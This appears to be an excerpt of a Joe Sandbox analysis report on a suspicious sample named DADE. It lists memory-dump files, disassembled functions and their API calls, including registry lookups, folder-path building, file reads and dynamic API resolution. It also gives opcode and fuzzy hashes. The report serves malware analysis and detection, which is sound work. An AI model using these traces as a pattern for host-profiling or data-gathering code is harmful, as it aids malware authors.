Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
String ID: vector<T> too long$yxxx$yxxx$x@$x@
API String ID: 2884196479-4254290729
Opcode ID: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
Instruction ID: 642d6f8d25606cb57c5c368211f8c71801378994f2d8b98954bdbb6ac3618ebc
Opcode Fuzzy Hash: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
Instruction Fuzzy Hash: 3F31B7B5E005159BCB08DF58C9906AEBBB6EB88310F14827EE905EB385DB34A901CBD5

Function 009F2A87 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 009F2A9C
RtlAllocateHeap.NTDLL(00000000), ref: 009F2AA3

Part of subcall function 009F2B17: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 009F2B2C
Part of subcall function 009F2B17: RtlAllocateHeap.NTDLL(00000000), ref: 009F2B33
Part of subcall function 009F2B17: RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,009F2AB0), ref: 009F2B52
Part of subcall function 009F2B17: RegQueryValueExA.ADVAPI32(009F2AB0,0043565C,00000000,00000000,00000000,000000FF), ref: 009F2B6C
Part of subcall function 009F2B17: RegCloseKey.ADVAPI32(009F2AB0), ref: 009F2B76

RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,009E97C7), ref: 009F2AD8
RegQueryValueExA.ADVAPI32(009E97C7,00638C34,00000000,00000000,00000000,000000FF), ref: 009F2AF3
RegCloseKey.ADVAPI32(009E97C7), ref: 009F2AFD

Strings

Windows 11, xrefs: 009F2AB7

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
Instruction ID: 349ef658ffb4b97ec27b3b58e6dd89c88c313124a64da9a4ec61afd44dd974a5
Opcode Fuzzy Hash: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
Instruction Fuzzy Hash: 3B01AD71640309BFDB149BA4AC89FFA7B7EEB44315F000159FE09D3290DAB09D448BE0

Function 009D7C07 Relevance: 10.1, APIs: 8, Instructions: 109stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009D7977: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 009D79AC
Part of subcall function 009D7977: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 009D79F1
Part of subcall function 009D7977: strlen.MSVCRT ref: 009D7A25
Part of subcall function 009D7977: StrStrA.SHLWAPI(?,0043508C), ref: 009D7A5F
Part of subcall function 009D7977: strcpy_s.MSVCRT ref: 009D7A88
Part of subcall function 009D7977: GetProcessHeap.KERNEL32(00000000,00000000), ref: 009D7A93
Part of subcall function 009D7977: HeapFree.KERNEL32(00000000), ref: 009D7A9A
Part of subcall function 009D7977: strlen.MSVCRT ref: 009D7AA7

lstrcat.KERNEL32(00638E68,0043509C), ref: 009D7C37
lstrcat.KERNEL32(00638E68,?), ref: 009D7C64
lstrcat.KERNEL32(00638E68,004350A0), ref: 009D7C76
lstrcat.KERNEL32(00638E68,?), ref: 009D7C97
wsprintfA.USER32 ref: 009D7CB7
lstrcpy.KERNEL32(00000000,?), ref: 009D7CE0
lstrcat.KERNEL32(00638E68,00000000), ref: 009D7CEE
lstrcat.KERNEL32(00638E68,0043509C), ref: 009D7D07

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
String ID:
API String ID: 2460923012-0
Opcode ID: 1b33f8e6ae0bd5b6c31613e9ea586c2b36b80fb2e963691b99dbe2669c738b8a
Instruction ID: c8d91c0d311618b8e66b2a8fc8de2cf2ed64cca2ecdf0ac9c73d07f4b4dd0a71
Opcode Fuzzy Hash: 1b33f8e6ae0bd5b6c31613e9ea586c2b36b80fb2e963691b99dbe2669c738b8a
Instruction Fuzzy Hash: FB31B572A54214EFCB14DBB4DC44AAAF77AFB88314F24951AF64993350EB74E940CBA0

Function 009F6177 Relevance: 9.2, APIs: 6, Instructions: 212COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 009F61C1
std::_Xinvalid_argument.LIBCPMT ref: 009F61E0
memmove.MSVCRT(FFFFFFFF,00000000,00000000,?,?,00000000), ref: 009F623B
memcpy.MSVCRT(00000010,?,?), ref: 009F625F
memcpy.MSVCRT(00000000,?,?), ref: 009F6274
std::_Xinvalid_argument.LIBCPMT ref: 009F6367

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$memcpy$memmove
String ID:
API String ID: 1795094292-0
Opcode ID: f44e9e1724c6da771fc665a3531611520f0502b6d9b36b20f8faa41871339d50
Instruction ID: 8d7a5e2b32580d5ad6a3b204aea4c545e236eae4729ac9e1b2988455d92209a0
Opcode Fuzzy Hash: f44e9e1724c6da771fc665a3531611520f0502b6d9b36b20f8faa41871339d50
Instruction Fuzzy Hash: 286170307103099BDB28CF9CC995ABEB7B6EF85304B644919E6A2C7381D770ED419B94

Function 009DA0A7 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 182memorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 009DA136
LocalAlloc.KERNEL32(00000040), ref: 009DA16E

Part of subcall function 009F7477: lstrcpy.KERNEL32(00000000,ERROR), ref: 009F7495

lstrcpy.KERNEL32(00000000,0043520C), ref: 009DA279

Strings

@"C, xrefs: 009DA21A
@, xrefs: 009DA14F

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocalmemset
String ID: @$@"C
API String ID: 4098468873-2306624759
Opcode ID: 348eed32ae7f3be2cf892227805f9ad38ab5b6ec06d10a2157ed781bce6e881d
Instruction ID: 1e752e0daa569c1112f2472ee8ec5beb8dc6bf2d4a31fd7958fef466df9bde4e
Opcode Fuzzy Hash: 348eed32ae7f3be2cf892227805f9ad38ab5b6ec06d10a2157ed781bce6e881d
Instruction Fuzzy Hash: 24510471A402489BDB10EFA4DC81BAE7BA8EF94318F148467F918AB351D774ED11CB80

Function 009EEDA7 Relevance: 9.1, APIs: 6, Instructions: 113stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009EEDF2
lstrcpy.KERNEL32(00000000,?), ref: 009EEE27
lstrcat.KERNEL32(?,00000000), ref: 009EEE33
lstrcat.KERNEL32(?,00431D64), ref: 009EEE4A
lstrcat.KERNEL32(?,00638DF8), ref: 009EEE5B
lstrcat.KERNEL32(?,00431D64), ref: 009EEE6B

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcat$FolderPathlstrcpy
String ID:
API String ID: 818526691-0
Opcode ID: bc7e0632fca65abe3c63a7a274d646b798d9d3e00812ea250c76545d3e573360
Instruction ID: ad2e5b01f925bdf013dec3ed17f668ead90c992bb0750368a92b4702635207d2
Opcode Fuzzy Hash: bc7e0632fca65abe3c63a7a274d646b798d9d3e00812ea250c76545d3e573360
Instruction Fuzzy Hash: DF417C71644244AFC314EF24DC46BEA77E5EFD9304F00C82AB95987291DE74E908DBA2

Function 00409AE0 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,004012EE), ref: 00409AFA
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,004012EE), ref: 00409B10
LocalAlloc.KERNEL32(00000040,?,?,?,?,004012EE), ref: 00409B27
ReadFile.KERNEL32(00000000,00000000,?,004012EE,00000000,?,?,?,004012EE), ref: 00409B40
LocalFree.KERNEL32(?,?,?,?,004012EE), ref: 00409B60
CloseHandle.KERNEL32(00000000,?,?,?,004012EE), ref: 00409B67

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 27aadecc548f36f42eb2dce9c3a0e69697191336073de94daf9abdf25517cddd
Instruction ID: d5e2846254d17b4b79341e9ac440d2f7db04c9e9ad0a28dbd651dd387858d46a
Opcode Fuzzy Hash: 27aadecc548f36f42eb2dce9c3a0e69697191336073de94daf9abdf25517cddd
Instruction Fuzzy Hash: 06114C71A00209AFE7109FA5ED84ABB737DFB04750F10016AB904A72C1EB78BD408BA8

Function 009D9D47 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,009D1555), ref: 009D9D61
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,009D1555), ref: 009D9D77
LocalAlloc.KERNEL32(00000040,?,?,?,?,009D1555), ref: 009D9D8E
ReadFile.KERNEL32(00000000,00000000,?,009D1555,00000000,?,?,?,009D1555), ref: 009D9DA7
LocalFree.KERNEL32(?,?,?,?,009D1555), ref: 009D9DC7
CloseHandle.KERNEL32(00000000,?,?,?,009D1555), ref: 009D9DCE

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 037b2ed9aec129e54901a5306ec9d4c93cee606d009a71b02df5ca158d82cdb5
Instruction ID: 6fa689d84ec794a57bc61c2f5bc62e3d5459b6c28301697f00d05a180d36195d
Opcode Fuzzy Hash: 037b2ed9aec129e54901a5306ec9d4c93cee606d009a71b02df5ca158d82cdb5
Instruction Fuzzy Hash: 60112BB1640209AFEB10EFA9DC84EBA777EEB08744F10865AF911972C0DB709D408BA0

Function 004089B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004089C6

Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A

std::_Xinvalid_argument.LIBCPMT ref: 004089FD

Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD

memcpy.MSVCRT(?,00000000,?,00000000,?,?,00408800,?,00000000,004077D7), ref: 00408A5B

Strings

invalid string position, xrefs: 004089C1
string too long, xrefs: 004089F8

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception$memcpy
String ID: invalid string position$string too long
API String ID: 2202983795-4289949731
Opcode ID: a1c32616d7e307a16c2fa6441a0b7187f150f24f1c37d319d238f952b07782fc
Instruction ID: 649aac53c67e3ee9f5cf0101b70db7c319c758bc323567c03d989288a4630d66
Opcode Fuzzy Hash: a1c32616d7e307a16c2fa6441a0b7187f150f24f1c37d319d238f952b07782fc
Instruction Fuzzy Hash: 0721F6723006108BC720AA5CEA40A6BF7A9DBA1760B20093FF181DB7C1DA79D841C7ED

Function 009D7097 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,004074D0,00000040,009D7634), ref: 009D70A7
memcpy.MSVCRT(?,00005A4D,000000F8,00000000), ref: 009D70E3
GetProcessHeap.KERNEL32(00000008,?), ref: 009D711B
RtlAllocateHeap.NTDLL(00000000), ref: 009D7122

Strings

@, xrefs: 009D7097

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Heapmemcpy$AllocateProcess
String ID: @
API String ID: 966719176-2766056989
Opcode ID: 69f325cfa0226fa075afd252caf388089ea43902eca3c4d2321855712a9bd385
Instruction ID: fd35aa5fca6206fa3320b136698f3226cf340c92f4247b982da965cf8650aee1
Opcode Fuzzy Hash: 69f325cfa0226fa075afd252caf388089ea43902eca3c4d2321855712a9bd385
Instruction Fuzzy Hash: E42181706447019BDB248BA0CC84BBBB3E8FB40705F84866DE956CB780F7B4E945CBA0

Function 009F2E17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 009F2E49
RtlAllocateHeap.NTDLL(00000000), ref: 009F2E50
GetTimeZoneInformation.KERNEL32(?), ref: 009F2E5F
wsprintfA.USER32 ref: 009F2E8A

Strings

wwww, xrefs: 009F2E70

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID: wwww
API String ID: 3317088062-671953474
Opcode ID: f69004c5f71f610b6d547f6432eddab92af069e70ec5a533afdf3a811bdd1a6c
Instruction ID: 12c68707ac2e319f13cccdfab6b791084b738db5efacad9efc9fb5f7768de77e
Opcode Fuzzy Hash: f69004c5f71f610b6d547f6432eddab92af069e70ec5a533afdf3a811bdd1a6c
Instruction Fuzzy Hash: 3D01F771A04604ABC7188F58DC4AB6AB76EE784720F10432AFD16D72C0D7B419008AE5

Function 00408B50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(004078EE,004088DD,03C3C3C3,00000401,004078EE,?,00000000,?,004078EE,80000001), ref: 00408B70
std::exception::exception.LIBCMT ref: 00408B8B
__CxxThrowException@8.LIBCMT ref: 00408BA0

Strings

Pv@, xrefs: 00408B99
x@, xrefs: 00408B7D, 00408B80

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: ??2@Exception@8Throwstd::exception::exception
String ID: Pv@$x@
API String ID: 3448701045-2507878009
Opcode ID: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
Instruction ID: d532d441e19495b57cb34d138c3e0c88a0b377879b543fee6e4065129139ec29
Opcode Fuzzy Hash: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
Instruction Fuzzy Hash: 37F027B160020997EB18E7E08D027BF7374AF00304F04847EA911E2340FB7CD605819A

Function 00408D80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,00408C9B,00000000,?,?,00000000), ref: 00408D92
std::exception::exception.LIBCMT ref: 00408DAD
__CxxThrowException@8.LIBCMT ref: 00408DC2

Strings

PC, xrefs: 00408DA3, 00408DB7, 00408DBA
Pv@, xrefs: 00408DBB

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: ??2@Exception@8Throwstd::exception::exception
String ID: Pv@$PC
API String ID: 3448701045-1362088297
Opcode ID: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
Instruction ID: c1c2e9470fcfd07362e0a09b01d9ac21ad58a2ed8b2a4eb6edd2c0a09cf1513b
Opcode Fuzzy Hash: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
Instruction Fuzzy Hash: 9AE02B7050030A97CB18F7B59D016BF73789F10304F40476FE965A22C1EF798504859D

Function 009E7967 Relevance: 7.9, APIs: 5, Instructions: 406stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009D9257: ??2@YAPAXI@Z.MSVCRT(00000020), ref: 009D9260

Part of subcall function 009F4A67: LoadLibraryA.KERNEL32(0043573C,?,009E79A8), ref: 009F4A6D
Part of subcall function 009F4A67: GetProcAddress.KERNEL32(00000000,00435748), ref: 009F4A83
Part of subcall function 009F4A67: GetProcAddress.KERNEL32(00000000,00435750), ref: 009F4A94
Part of subcall function 009F4A67: GetProcAddress.KERNEL32(00000000,0043575C), ref: 009F4AA5
Part of subcall function 009F4A67: GetProcAddress.KERNEL32(00000000,00435768), ref: 009F4AB6
Part of subcall function 009F4A67: GetProcAddress.KERNEL32(00000000,00435770), ref: 009F4AC7
Part of subcall function 009F4A67: GetProcAddress.KERNEL32(00000000,0043577C), ref: 009F4AD8
Part of subcall function 009F4A67: GetProcAddress.KERNEL32(00000000,00435784), ref: 009F4AE9
Part of subcall function 009F4A67: GetProcAddress.KERNEL32(00000000,0043578C), ref: 009F4AFA
Part of subcall function 009F4A67: GetProcAddress.KERNEL32(00000000,0043579C), ref: 009F4B0B
Part of subcall function 009F4A67: GetProcAddress.KERNEL32(00000000,004357A8), ref: 009F4B1C

StrCmpCA.SHLWAPI(?,00638AAC), ref: 009E79D7
StrCmpCA.SHLWAPI(?,00638C1C), ref: 009E7AAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E7AE7
lstrcpy.KERNEL32(00000000,?), ref: 009E7B44

Part of subcall function 009F74A7: lstrcpy.KERNEL32(00000000), ref: 009F74C1

Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D169E
Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D16C0
Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D16E2
Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D1746

Part of subcall function 009E5E47: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E5E7C
Part of subcall function 009E5E47: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009E5EAB
Part of subcall function 009E5E47: lstrcpy.KERNEL32(00000000,00000000), ref: 009E5EDC
Part of subcall function 009E5E47: lstrcpy.KERNEL32(00000000,00000000), ref: 009E5F04
Part of subcall function 009E5E47: lstrcat.KERNEL32(00000000,00000000), ref: 009E5F0F
Part of subcall function 009E5E47: lstrcpy.KERNEL32(00000000,00000000), ref: 009E5F37

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$AddressProc$??2@FolderLibraryLoadPathlstrcat
String ID:
API String ID: 3558977763-0
Opcode ID: 6aeff865d584790d0d634a92a901b01971934c05726d59cf815502abfbd14370
Instruction ID: c41137b8a27057b4fd38ebcb697f0a6b3ca640d4287a1e9fd277bbc7f4409ca0
Opcode Fuzzy Hash: 6aeff865d584790d0d634a92a901b01971934c05726d59cf815502abfbd14370
Instruction Fuzzy Hash: D0F18171A042458FCB25DFA9C844B69B7B5BF88324F29C1ADD8089B3A2D735ED41CF91

Function 009E7E76 Relevance: 7.9, APIs: 5, Instructions: 367stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00638AAC), ref: 009E79D7
